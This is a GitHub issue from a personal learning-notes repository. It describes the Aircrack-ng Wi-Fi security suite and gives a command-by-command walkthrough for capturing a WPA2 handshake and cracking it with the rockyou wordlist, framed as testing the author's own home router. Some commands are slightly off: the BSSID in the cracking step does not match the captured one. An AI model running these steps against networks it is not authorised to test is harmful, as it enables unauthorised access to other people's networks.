search

anitsh / til

Today I Learn (til) - Github `Issues` used as daily learning management system for taking notes and storing resource links.
https://anitshrestha.com.np
MIT License
78 stars 11 forks source link

Aircrack-ng #135

Open anitsh opened 4 years ago

anitsh commented 4 years ago

Aircrack-ng is a complete suite of tools to assess WiFi network security.

It focuses on different areas of WiFi security:

  • Monitoring: Packet capture and export of data to text files for further processing by third party tools
  • Attacking: Replay attacks, de-authentication, fake access points and others via packet injection
  • Testing: Checking WiFi cards and driver capabilities (capture and injection)
  • Cracking: WEP and WPA PSK (WPA 1 and 2)

All tools are command line which allows for heavy scripting:

  • Airmon-ng is used to manage wireless card modes and to kill unnecessary processes while using aircrack-ng. To sniff a wireless connection, you need to change your wireless card from managed mode to monitor mode and airmon-ng is used for that purpose.
  • Airodump-ng is a wireless sniffer that can capture wireless data from one or more wireless Access Points. It is used to analyze nearby Access Points(AP) and to capture handshakes.
  • Aireplay-ng is used for replay attacks and as packet injector. It can be used to de-authenticate users from their AP to capture handshakes.
  • Airdecap-ng is used to decrypt encrypted WEP, WPA/WPA2 wireless packets with known key.
  • Aircrack-ng is used to attack WPA/WEP wireless protocols in order to find the key.

Resources:

anitsh commented 4 years ago

Penetration testing home router with aircrack-ng

Objectives: Access home router wifi password

Conclusion: From the usage of the tool, it simply does is to compare the passwords in the list to identify the password.

Steps:

  1. Install Kali Linux on docker

  1. Install aircrack-ng, and pciutils apt-get install -y aircrack-ng pciutils

  2. Save the container's state in a new image

  3. Run new container image docker run -it --net="host" --privileged --name aircrack kali-aircrack bash

  4. Get the name of the wifi device iwconfig

  5. Start airmon-ng to monitor the wifi airmon-ng start wlp9s0 // wifi device name wlp9s0 may vary // Internet will not work now // Device now will be named such as wlp9s0mon

  6. List out the wifi devices in the area. airodump-ng wlp9s0mon // Let it list out the devices. Then exit. // Select the device's MAC address(BSSID) and CH for the penetration test.

  7. Capture exchanged 802.11 frames in that device using BSSID and CH airodump-ng --bssid 88:B3:62:24:2D:69 -c 4 wlp9s0mon --write /tmp/handshake.cap // For easy read dump to a file

  8. There is a default password provided by Kali. Unarchive the passwords file. gunzip /usr/share/wordlists/rockyou.txt.gz /usr/share/wordlists/rockyou.txt

  9. Crack the password from the device captured data. aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt handshake.cap
    // Here -a2 is the ENC(encryption) type for WPA2. -a for WPA.

If there is a password match it will provide the password.

anitsh commented 4 years ago

Further research could be done with:

and find other methods and tools.